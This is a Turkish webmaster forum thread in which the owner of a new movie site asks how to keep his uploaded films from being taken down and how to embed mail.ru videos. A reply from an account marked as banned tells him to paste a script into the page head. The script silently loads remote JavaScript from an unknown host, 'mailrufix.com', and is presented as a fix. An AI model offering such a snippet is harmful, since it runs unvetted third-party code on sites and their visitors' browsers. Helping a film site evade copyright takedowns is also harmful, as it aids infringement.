lostyazilim
tr.link

Kaldırılan filmler

3 Mesajlar 1.101 Okunma
acebozum
tr.link

proteemo456 proteemo456 WM Aracı Kullanıcı
  • Üyelik 10.06.2015
  • Yaş/Cinsiyet 28 / E
  • Meslek PC Programcılığı
  • Konum Bursa
  • Ad Soyad B** S**
  • Mesajlar 495
  • Beğeniler 50 / 50
  • Ticaret 21, (%95)
Saygıdeğer hocalarım merhabalar 15 günlük bir film sitem var ve özgün içerik ekliyorum sitemdeki filmlerin nerdeyse hepsi kendi uploadım ve altyazım mevcut filmlerde ama canımı sıkan bi durum var up/down yapıyorum filmleri ve upload ettiğim sitelerden bir süre sonra kaldırılıyor googlede rakiplerime bakıyorum 1-2 sayfadaki sitelerin hepsi online izleme imkanı sağlıyor aynı filme üstelik aynı siteden nasıl oluyorda benimki silinip onlarınki silinmiyor bu konuda izlememi tavsiye ettiğiniz bir strateji var mı? bi diğer konuda mail.ru filmlerini nasıl sitemde yayınlayabilirim rakipler bunuda yapıyor :D

Ek Olarak: sitemde yayınlayabilirim derken mail.ru sitesine aktarıyor normalde bir uyarı dahilinde ama çoğu rakip site bunu yaptırmadan direk film sitesinden izleme imkanı sunuyor nasıl yapabilirim bunu

elektronikssl
webimgo

EmreToktas EmreToktas Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 08.06.2013
  • Yaş/Cinsiyet 33 / E
  • Meslek Yönetici
  • Konum İstanbul Avrupa
  • Ad Soyad M** T**
  • Mesajlar 151
  • Beğeniler 8 / 24
  • Ticaret 21, (%90)
Head arasına şu kodu ekleyin:

<script>!function(d,h,s,id){var js,fjs=d.getElementsByTagName(h)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="http://mailrufix.com/load.js?v7";fjs.appendChild(js,fjs);}}(document,"head","script","mailrufix");</script>

Bu kodu ekledikten sonra sitenizde açılmaya başlayacak videolar.

proteemo456 proteemo456 WM Aracı Kullanıcı
  • Üyelik 10.06.2015
  • Yaş/Cinsiyet 28 / E
  • Meslek PC Programcılığı
  • Konum Bursa
  • Ad Soyad B** S**
  • Mesajlar 495
  • Beğeniler 50 / 50
  • Ticaret 21, (%95)
hocam head derken header mi?

Ek Olarak: hocam headere ekledim ama bişey değişmedi vk ok.ru zaten sitede açılıyordu ama mail.ru hala sitede açılmıyor

Ek Olarak: yardımcı olabilcek yok mu?

wmaraci
wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al